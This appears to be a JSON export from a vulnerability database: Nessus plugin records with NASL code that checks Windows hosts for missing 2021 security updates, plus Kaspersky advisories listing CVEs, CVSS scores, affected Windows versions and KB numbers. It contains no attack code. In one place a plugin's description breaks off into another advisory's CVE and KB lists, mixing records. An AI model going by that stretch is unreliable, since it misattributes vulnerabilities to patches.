smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007192])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:16", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n 
audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:37:24", "description": "The remote Windows host is missing security update. See Vendor Advisory for KB5007205", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007205: Windows 2022 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007205.NASL", "href": "https://www.tenable.com/plugins/nessus/154994", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154994);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007205\");\n script_xref(name:\"MSFT\", value:\"MS21-5007205\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007205: Windows 2022 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update. 
\n[CVE-2021-24081](<https://nvd.nist.gov/vuln/detail/CVE-2021-24081>) \n[CVE-2021-24077](<https://nvd.nist.gov/vuln/detail/CVE-2021-24077>) \n[CVE-2021-1698](<https://nvd.nist.gov/vuln/detail/CVE-2021-1698>) \n[CVE-2021-24106](<https://nvd.nist.gov/vuln/detail/CVE-2021-24106>) \n[CVE-2021-1732](<https://nvd.nist.gov/vuln/detail/CVE-2021-1732>) \n[CVE-2021-24091](<https://nvd.nist.gov/vuln/detail/CVE-2021-24091>) \n[CVE-2020-17162](<https://nvd.nist.gov/vuln/detail/CVE-2020-17162>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4577048](<http://support.microsoft.com/kb/4577048>) \n[4571756](<http://support.microsoft.com/kb/4571756>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4577032](<http://support.microsoft.com/kb/4577032>) \n[4577049](<http://support.microsoft.com/kb/4577049>) \n[4577015](<http://support.microsoft.com/kb/4577015>) \n[4577066](<http://support.microsoft.com/kb/4577066>) \n[4574727](<http://support.microsoft.com/kb/4574727>) \n[4577071](<http://support.microsoft.com/kb/4577071>) \n[4577038](<http://support.microsoft.com/kb/4577038>) \n[4601354](<http://support.microsoft.com/kb/4601354>) \n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[4601357](<http://support.microsoft.com/kb/4601357>) \n[4601348](<http://support.microsoft.com/kb/4601348>) \n[4601318](<http://support.microsoft.com/kb/4601318>) \n[4601384](<http://support.microsoft.com/kb/4601384>) \n[4601349](<http://support.microsoft.com/kb/4601349>) \n[4601331](<http://support.microsoft.com/kb/4601331>) \n[5008218](<http://support.microsoft.com/kb/5008218>) \n[5008206](<http://support.microsoft.com/kb/5008206>) \n[5008212](<http://support.microsoft.com/kb/5008212>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "kaspersky", "title": "KLA12071 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17162", "CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-12-16T00:00:00", "id": "KLA12071", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12071/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T17:36:53", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 7 for 32-bit Systems Service Pack 
1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-26443](<https://nvd.nist.gov/vuln/detail/CVE-2021-26443>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42280](<https://nvd.nist.gov/vuln/detail/CVE-2021-42280>) \n[CVE-2021-42288](<https://nvd.nist.gov/vuln/detail/CVE-2021-42288>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-42276](<https://nvd.nist.gov/vuln/detail/CVE-2021-42276>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-36957](<https://nvd.nist.gov/vuln/detail/CVE-2021-36957>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42279](<https://nvd.nist.gov/vuln/detail/CVE-2021-42279>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n[CVE-2021-42284](<https://nvd.nist.gov/vuln/detail/CVE-2021-42284>) \n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-42286](<https://nvd.nist.gov/vuln/detail/CVE-2021-42286>) 
\n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-42274](<https://nvd.nist.gov/vuln/detail/CVE-2021-42274>) \n[CVE-2021-42277](<https://nvd.nist.gov/vuln/detail/CVE-2021-42277>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-41378](<https://nvd.nist.gov/vuln/detail/CVE-2021-41378>) \n[CVE-2021-41356](<https://nvd.nist.gov/vuln/detail/CVE-2021-41356>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-41366](<https://nvd.nist.gov/vuln/detail/CVE-2021-41366>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41367>)4.6Warning \n[CVE-2021-41371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42275>)6.5High 
\n[CVE-2021-38631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42287>)6.5High \n[CVE-2021-26443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26443>)7.7Critical \n[CVE-2021-42280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42280>)4.6Warning \n[CVE-2021-42288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42288>)3.6Warning \n[CVE-2021-42276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42276>)6.8High \n[CVE-2021-36957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36957>)4.6Warning \n[CVE-2021-42279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42279>)5.1High \n[CVE-2021-42284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42284>)7.1High \n[CVE-2021-42286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42286>)4.6Warning \n[CVE-2021-42274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42274>)2.1Warning \n[CVE-2021-42277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42277>)4.6Warning \n[CVE-2021-41378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41378>)6.5High \n[CVE-2021-41356](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41356>)5.0Critical \n[CVE-2021-41366](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41366>)4.6Warning\n\n### *KB list*:\n[5007260](<http://support.microsoft.com/kb/5007260>) \n[5007255](<http://support.microsoft.com/kb/5007255>) \n[5007206](<http://support.microsoft.com/kb/5007206>) \n[5007207](<http://support.microsoft.com/kb/5007207>) \n[5007186](<http://support.microsoft.com/kb/5007186>) \n[5007192](<http://support.microsoft.com/kb/5007192>) \n[5007215](<http://support.microsoft.com/kb/5007215>) \n[5007205](<http://support.microsoft.com/kb/5007205>) 
\n[5007245](<http://support.microsoft.com/kb/5007245>) \n[5007247](<http://support.microsoft.com/kb/5007247>) \n[5007189](<http://support.microsoft.com/kb/5007189>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12345 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-01-18T00:00:00", "id": "KLA12345", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12345/", "cvss": {"score": 7.7, "vector": 
"AV:A/AC:L/Au:S/C:C/I:C/A:C"}}]}